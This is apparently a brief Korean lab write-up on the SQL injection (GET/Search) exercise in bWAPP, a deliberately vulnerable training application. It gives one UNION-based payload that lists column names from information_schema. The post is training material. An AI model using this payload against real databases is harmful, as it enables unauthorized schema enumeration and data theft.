Language
한국어

[bWAPP] SQL Injection (GET/Search)

2016.10.18 17:47

lispro06 조회 수:887

A1 - Injection

SQL Injection (GET/Search)


컬럼명을 담고 있는 db의 table로 접근해 SQL Injection 공격을 해볼 수 있다.


Iron Man' union select 1,1,1,column_name,1,1,1 from information_schema.columns;#


A1SQL1.PNG